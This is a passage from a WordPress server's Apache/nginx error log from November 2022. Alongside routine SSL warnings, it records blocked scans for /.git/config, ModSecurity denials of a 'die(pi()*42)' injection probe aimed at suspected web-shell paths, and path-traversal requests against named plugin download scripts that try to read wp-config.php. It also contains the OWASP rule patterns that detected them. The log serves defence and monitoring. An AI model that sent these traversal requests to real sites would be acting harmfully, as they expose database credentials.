140085359847296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 11:18:58.459531 2022] [ssl:warn] [pid 25090:tid 140085359847296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 15:22:33.950892 2022] [ssl:warn] [pid 25090:tid 140085359847296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 15:52:37.359647 2022] [ssl:warn] [pid 25090:tid 140085359847296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 16 17:09:58.816032 2022] [ssl:warn] [pid 25090:tid 140085359847296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2022/11/16 17:12:45 [error] 18161#18161: *8593 access forbidden by rule, client: 52.38.246.168, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Nov 16 22:05:35.985878 2022] [:error] [pid 17584:tid 140085055977216] [client 152.89.196.13:41554] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/wp-content.php"] [unique_id "Y3Wk_371xefG3-Tca1GawAAAAIY"] [Wed Nov 16 22:35:46.725331 2022] [ssl:warn] [pid 25090:tid 140085359847296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 17 00:54:04.384702 2022] [ssl:warn] [pid 25090:tid 140085359847296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 17 00:54:49.777500 2022] [ssl:warn] [pid 25090:tid 140085359847296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 17 03:37:31.594374 2022] [ssl:warn] [pid 16989:tid 139769931597696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 17 03:37:31.755394 2022] [ssl:warn] [pid 16990:tid 139769931597696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 17 03:37:32.258113 2022] [ssl:warn] [pid 16990:tid 139769931597696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 17 03:37:33.979799 2022] [ssl:warn] [pid 16990:tid 139769931597696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 17 03:37:36.243442 2022] [ssl:warn] [pid 17413:tid 140034337466240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 17 03:37:36.380297 2022] [ssl:warn] [pid 17414:tid 140034337466240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 17 12:32:31.604337 2022] [autoindex:error] [pid 17441:tid 140033885386496] [client 92.205.56.212:41718] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2022/11/17 13:09:17 [error] 17301#17301: *30896 access forbidden by rule, client: 54.219.14.39, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/17 13:09:18 [error] 17300#17300: *30897 access forbidden by rule, client: 54.219.14.39, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/17 13:09:18 [error] 17301#17301: *30898 access forbidden by rule, client: 54.219.14.39, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/17 13:09:18 [error] 17301#17301: *30899 access forbidden by rule, client: 54.219.14.39, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/17 13:09:19 [error] 17300#17300: *30902 access forbidden by rule, client: 54.219.14.39, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/17 13:09:19 [error] 17300#17300: *30903 access forbidden by rule, client: 54.219.14.39, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Nov 17 13:59:19.623062 2022] [:error] [pid 18088:tid 140033935742720] [client 152.89.196.13:44188] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/haccess.php"] [unique_id "Y3aEhxlXuk5gpg0-2q3zJQAAANI"] [Thu Nov 17 15:13:29.681887 2022] [:error] [pid 17440:tid 140034131666688] [client 152.89.196.13:46020] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:css: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/user/myk.php"] [unique_id "Y3aV6a4WNQvvqOz8JzLSGQAAAEM"] [Thu Nov 17 15:56:00.896191 2022] [:error] [pid 18088:tid 140034140059392] [client 152.89.196.13:47588] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/ms-admin-wp.php"] [unique_id "Y3af4BlXuk5gpg0-2q31OQAAAMI"] 2022/11/17 16:08:40 [error] 17300#17300: *34124 access forbidden by rule, client: 3.16.180.168, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Nov 17 16:59:03.052847 2022] [ssl:warn] [pid 15374:tid 140017352992640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 17 16:59:03.189316 2022] [ssl:warn] [pid 15375:tid 140017352992640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 17 19:08:06.275017 2022] [autoindex:error] [pid 15377:tid 140016940414720] [client 43.130.99.186:54984] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Nov 18 00:17:52.345767 2022] [ssl:warn] [pid 15375:tid 140017352992640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 18 00:18:56.214361 2022] [ssl:warn] [pid 15375:tid 140017352992640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 18 03:31:29.443963 2022] [ssl:warn] [pid 14836:tid 139651748427648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 18 03:31:29.577421 2022] [ssl:warn] [pid 14843:tid 139651748427648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 18 03:31:29.925140 2022] [ssl:warn] [pid 14843:tid 139651748427648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 18 03:31:31.612285 2022] [ssl:warn] [pid 14843:tid 139651748427648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 18 03:31:33.862252 2022] [ssl:warn] [pid 15482:tid 139723453527936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 18 03:31:33.984076 2022] [ssl:warn] [pid 15483:tid 139723453527936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 18 03:32:11.508969 2022] [ssl:warn] [pid 15483:tid 139723453527936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 18 11:49:00.714125 2022] [autoindex:error] [pid 16407:tid 139723163019008] [client 20.107.114.108:50334] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Nov 18 14:11:53.534582 2022] [ssl:warn] [pid 15483:tid 139723453527936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 18 17:57:38.811348 2022] [:error] [pid 27506:tid 139723045521152] [client 152.89.196.13:60448] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/js/js.php"] [unique_id "Y3gN4ooUO8xZXyvFI-mj4QAAANM"] [Sat Nov 19 00:07:48.668853 2022] [:error] [pid 27506:tid 139723062306560] [client 152.89.196.13:54616] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/catalog/catalog.php"] [unique_id "Y3hkpIoUO8xZXyvFI-mzlAAAANE"] [Sat Nov 19 03:07:22.937605 2022] [ssl:warn] [pid 21312:tid 139679913281408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 19 03:07:23.068185 2022] [ssl:warn] [pid 21313:tid 139679913281408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 19 03:07:23.564838 2022] [ssl:warn] [pid 21313:tid 139679913281408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 19 03:07:25.273662 2022] [ssl:warn] [pid 21313:tid 139679913281408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 19 03:07:28.903510 2022] [ssl:warn] [pid 21792:tid 140696159561600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 19 03:07:29.044073 2022] [ssl:warn] [pid 21793:tid 140696159561600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2022/11/19 09:48:40 [error] 21746#21746: *61432 access forbidden by rule, client: 94.23.133.43, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/19 09:48:43 [error] 21746#21746: *61439 access forbidden by rule, client: 94.23.133.43, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/11/19 09:48:49 [error] 21746#21746: *61460 access forbidden by rule, client: 94.23.133.43, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Nov 19 12:37:22.848572 2022] [:error] [pid 21810:tid 140695746574080] [client 152.89.196.13:46382] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:google: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/backup_index.php"] [unique_id "Y3kUUpsrRNfFtig-30vqOQAAABM"] [Sat Nov 19 17:06:12.868791 2022] [autoindex:error] [pid 21812:tid 140695738181376] [client 20.127.63.53:54366] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Nov 20 02:04:56.169028 2022] [ssl:warn] [pid 21793:tid 140696159561600] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 20 03:11:29.249502 2022] [ssl:warn] [pid 24390:tid 140244247558016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 20 03:11:29.427559 2022] [ssl:warn] [pid 24391:tid 140244247558016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 20 03:11:29.664620 2022] [ssl:warn] [pid 24391:tid 140244247558016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 20 03:11:31.330848 2022] [ssl:warn] [pid 24391:tid 140244247558016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 20 03:11:33.766883 2022] [ssl:warn] [pid 24844:tid 140285382915968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 20 03:11:33.916518 2022] [ssl:warn] [pid 24845:tid 140285382915968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 20 08:24:38.345997 2022] [:error] [pid 25265:tid 140285107500800] [client 152.89.196.13:42216] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-task.php"] [unique_id "Y3oqluxhyqyvQGdSVSp-vAAAAMM"] [Sun Nov 20 08:33:16.442452 2022] [:error] [pid 25265:tid 140285006788352] [client 152.89.196.13:43058] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/assets/images/s_noeval.php"] [unique_id "Y3osnOxhyqyvQGdSVSp_UgAAAM8"] [Sun Nov 20 10:13:41.803455 2022] [:error] [pid 24867:tid 140284998395648] [client 152.89.196.13:52638] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-cast.php"] [unique_id "Y3pEJS7PcYBUpDLnPIJHWgAAAJA"] [Sun Nov 20 15:32:22.187792 2022] [:error] [pid 25265:tid 140285015181056] [client 68.219.115.214:52284] [client 68.219.115.214] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "Y3qO1uxhyqyvQGdSVSqcAAAAAM4"], referer: https://www.google.com [Sun Nov 20 15:32:38.147729 2022] [:error] [pid 25265:tid 140285107500800] [client 68.219.115.214:52336] [client 68.219.115.214] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y3qO5uxhyqyvQGdSVSqcDQAAAMM"], referer: https://www.google.com [Sun Nov 20 15:32:52.785053 2022] [:error] [pid 24865:tid 140285202294528] [client 68.219.115.214:52380] [client 68.219.115.214] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "Y3qO9LVeI6MCkRxQb2yjagAAAAA"], referer: https://www.google.com [Sun Nov 20 15:33:14.633349 2022] [:error] [pid 25265:tid 140285090715392] [client 68.219.115.214:52450] [client 68.219.115.214] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "Y3qPCuxhyqyvQGdSVSqcJAAAAMU"], referer: https://www.google.com [Sun Nov 20 15:33:23.604841 2022] [:error] [pid 24865:tid 140284981610240] [client 68.219.115.214:52476] [client 68.219.115.214] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri 